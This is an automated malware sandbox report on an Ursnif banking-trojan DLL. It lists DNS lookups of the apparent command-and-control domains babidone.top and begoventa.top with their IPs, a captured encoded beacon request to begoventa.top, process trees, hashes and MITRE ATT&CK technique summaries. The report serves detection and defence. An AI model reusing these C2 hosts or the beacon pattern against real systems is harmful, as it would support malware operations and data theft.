Jan 12, 2021 18:11:03.677486897 CET	56338	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:11:03.751777887 CET	53	56338	8.8.8.8	192.168.2.3
Jan 12, 2021 18:11:04.371150970 CET	59420	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:11:04.430051088 CET	53	59420	8.8.8.8	192.168.2.3
Jan 12, 2021 18:11:25.976330996 CET	58784	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:11:26.035058022 CET	53	58784	8.8.8.8	192.168.2.3
Jan 12, 2021 18:11:27.121786118 CET	63978	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:11:27.178491116 CET	53	63978	8.8.8.8	192.168.2.3
Jan 12, 2021 18:11:27.196666956 CET	62938	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:11:27.311280966 CET	53	62938	8.8.8.8	192.168.2.3
Jan 12, 2021 18:11:27.316843033 CET	55708	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:11:27.373126030 CET	53	55708	8.8.8.8	192.168.2.3
Jan 12, 2021 18:11:49.644403934 CET	56803	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:11:49.702145100 CET	53	56803	8.8.8.8	192.168.2.3
Jan 12, 2021 18:11:50.897178888 CET	57145	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:11:51.312241077 CET	53	57145	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:10.396784067 CET	55359	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:10.456108093 CET	53	55359	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:10.931917906 CET	58306	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:10.988442898 CET	53	58306	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:11.538985014 CET	64124	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:11.595397949 CET	53	64124	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:11.980071068 CET	49361	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:12.036189079 CET	53	49361	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:12.442333937 CET	63150	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:12.503580093 CET	53	63150	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:12.751403093 CET	53279	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:12.955703020 CET	56881	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:13.012136936 CET	53	56881	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:13.178747892 CET	53	53279	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:13.470160007 CET	53642	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:13.518147945 CET	53	53642	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:14.130614996 CET	55667	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:14.189860106 CET	53	55667	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:14.830266953 CET	54833	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:14.886481047 CET	53	54833	8.8.8.8	192.168.2.3
Jan 12, 2021 18:12:15.285181999 CET	62476	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:12:15.341681957 CET	53	62476	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 12, 2021 18:10:49.856673002 CET	192.168.2.3	8.8.8.8	0x7022	Standard query (0)	babidone.top	A (IP address)	IN (0x0001)
Jan 12, 2021 18:11:04.371150970 CET	192.168.2.3	8.8.8.8	0x921d	Standard query (0)	babidone.top	A (IP address)	IN (0x0001)
Jan 12, 2021 18:11:50.897178888 CET	192.168.2.3	8.8.8.8	0xce42	Standard query (0)	begoventa.top	A (IP address)	IN (0x0001)
Jan 12, 2021 18:12:12.751403093 CET	192.168.2.3	8.8.8.8	0x4b5d	Standard query (0)	babidone.top	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 12, 2021 18:10:50.276988029 CET	8.8.8.8	192.168.2.3	0x7022	No error (0)	babidone.top		193.56.255.166	A (IP address)	IN (0x0001)
Jan 12, 2021 18:11:04.430051088 CET	8.8.8.8	192.168.2.3	0x921d	Server failure (2)	babidone.top	none	none	A (IP address)	IN (0x0001)
Jan 12, 2021 18:11:51.312241077 CET	8.8.8.8	192.168.2.3	0xce42	No error (0)	begoventa.top		47.91.89.242	A (IP address)	IN (0x0001)
Jan 12, 2021 18:12:13.178747892 CET	8.8.8.8	192.168.2.3	0x4b5d	No error (0)	babidone.top		193.56.255.166	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

begoventa.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49746	47.91.89.242	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 12, 2021 18:11:51.384207964 CET	4237	OUT	GET /images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9mxw/6WnzZpVL425M/CKmLBjBrvSn/f81OVwTXuZJrQZ/ja96eHVtqviz347i3JPx7/5Q6Nnj7RuUGPOFSU/4_2BMMGnBKrRLtO/P_2FyE_2BfezXukLEe/1gUCCjKEM/NO_2BQ8BNJkX/Zge.avi HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: begoventa.top Connection: Keep-Alive
Jan 12, 2021 18:11:51.427160025 CET	4238	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49747	47.91.89.242	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 12, 2021 18:11:51.820136070 CET	4238	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: begoventa.top Connection: Keep-Alive
Jan 12, 2021 18:11:51.863253117 CET	4238	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6132 Parent PID: 5668

General

Start time:	18:09:26
Start date:	12/01/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\zQ32b1FVcL.dll'
Imagebase:	0x1230000
File size:	120832 bytes
MD5 hash:	2D39D4DFDE8F7151723794029AB8A034
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: iexplore.exe PID: 6388 Parent PID: 792

General

Start time:	18:10:04
Start date:	12/01/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff7f5860000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6496 Parent PID: 6388

General

Start time:	18:10:04
Start date:	12/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2
Imagebase:	0x300000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 1140 Parent PID: 792

General

Start time:	18:10:47
Start date:	12/01/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff7488e0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 4144 Parent PID: 1140

General

Start time:	18:10:48
Start date:	12/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1140 CREDAT:17410 /prefetch:2
Imagebase:	0x300000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 3288 Parent PID: 792

General

Start time:	18:11:25
Start date:	12/01/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff7f5860000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6620 Parent PID: 3288

General

Start time:	18:11:25
Start date:	12/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3288 CREDAT:17410 /prefetch:2
Imagebase:	0x300000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 3984 Parent PID: 792

General

Start time:	18:11:48
Start date:	12/01/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff7f5860000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6772 Parent PID: 3984

General

Start time:	18:11:49
Start date:	12/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3984 CREDAT:17410 /prefetch:2
Imagebase:	0x300000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report zQ32b1FVcL.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries